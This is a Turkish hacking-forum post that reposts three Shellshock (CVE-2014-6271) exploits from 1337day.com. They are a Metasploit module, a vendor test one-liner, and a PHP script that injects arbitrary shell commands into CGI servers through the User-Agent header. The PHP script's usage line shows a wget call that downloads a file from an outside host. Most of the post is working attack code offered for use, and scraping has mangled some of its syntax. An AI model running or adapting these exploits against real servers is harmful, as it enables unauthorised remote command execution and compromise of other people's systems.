Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 4
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Unix Bash Açığı Exploitleri / 1337day.com Exploitleri
'[[email protected]]
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 19 / 249
Deneyim: 97 / 100
Rep Sayısı: 24
Mesaj Sayısı: 142
Üyelik Tarihi: 24.01.2014
      
Yorum: #1
Unix Bash Açığı Exploitleri / 1337day.com Exploitleri
28.09.2014 15:47
Arkadaşlar Yeni Çıkan Bash Açığı İle 500 Milyon Kadar Bilgisayarın Etkileneceği Düşünülüyor.
Haber : Unix'teki Bash Açığı Tehlikesi Büyüyor !!
Alıntı:1. Exploit
http://1337day.com/exploit/description/22693
http://1337day.com/exploit/22693
PHP Kod:
require 'msf/core'
  
class Metasploit3 Msf::Auxiliary
  
    
include Msf::Exploit::Remote::HttpClient
  
  
    def initialize
(info = {})
        
super(update_info(info,
            
'Name'           => 'bashedCgi',
            
'Description'    => %q{
               
Quick dirty module to send the BASH exploit payload (CVE-2014-6271to CGI scripts that are BASH-based or invoke BASHto execute an arbitrary shell command.
            },
            
'Author'         =>
              [
                
'Stephane Chazelas',                      # vuln discovery
                
'Shaun Colley <scolley at ioactive.com>'  # metasploit module
              
],
            
'License'        => MSF_LICENSE,
            
'References'     => [ 'CVE''2014-6271' ],
            
'Targets'        =>
                [
                    [ 
'cgi', {} ]
                ],
            
'DefaultTarget'  => 0,
            
'Payload'        =>
                {
                
'Space'      => 1024,
                
'DisableNops' => true
                
},
            
'DefaultOptions' => { 'PAYLOAD' => }
        ))
  
            
register_options(
                [
                    
OptString.new('TARGETURI', [true'Absolute path of BASH-based CGI''/']),
                    
OptString.new('CMD', [true'Command to execute''/usr/bin/touch /tmp/metasploit'])
                ], 
self.class)
    
end
  
    def run
        res 
send_request_cgi({
            
'method'   => 'GET',
            
'uri'      => datastore['TARGETURI'],
            
'agent'    => "() { :;}; " datastore['CMD']
        })
  
        if 
res && res.code == 200
            print_good
("Command sent - 200 received")
        else
            
print_error("Command sent - non-200 reponse")
        
end
    end
end
 
# 85A9CFF0728D13D1   1337day.com [2014-09-28]   1888388C48740A0E # 
Alıntı:2. Exploit
http://1337day.com/exploit/description/22691
http://1337day.com/exploit/22691
PHP Kod:
The following is an excerpt fromhttps://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
  
Like “real” programming languagesBash has functionsthough in a somewhat limited implementation, and it is possible to put these bash functions into environment variablesThis flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
  
env x='() { :;}; echo vulnerable' bash -"echo this is a test"
 
vulnerable
 this is a test
  
The patch used to fix this flaw
ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bashyou should get an output similar to:
  
 $ 
env x='() { :;}; echo vulnerable' bash -"echo this is a test"
 
bashwarningxignoring function definition attempt
 bash
error importing function definition for `x'
 this is a test
 
# 484320FF55EDD220   1337day.com [2014-09-28]   F9F8D00661F71520 # 
Alıntı:3. Exploit
http://1337day.com/exploit/description/22692
http://1337day.com/exploit/22692
PHP Kod:
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
       GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
       Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
  
Test CGI Code : #!/bin/bash
        echo "Content-type: text/html"
        echo ""
        echo "Bash-is-Vulnerable"
  
*/
error_reporting(0);
if(!
defined('STDIN')) die("Please run it through command-line!\n");
$x  getopt("u:c:");
if(!isset(
$x['u']) || !isset($x['c']))
{
die(
"Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
  
}
$url $x['u'];
$cmd $x['c'];
  
    
$context stream_context_create(
        array(
            
'http' => array(
                
'method'  => 'GET',
                
'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
            
)
        )
    );
      
    if(!
file_get_contents($urlfalse$context) && strpos($http_response_header[0],"500") > 0)
    die(
"Command sent to the server!\n");
    else
    die(
"Connection Error\n");
?>
 
# CC94A489856180E4   1337day.com [2014-09-28]   CC4089344E68D353 # 

Selametle / '[[email protected]]
Alinti
Rep Verenler: M4M00D



1 Ziyaretçi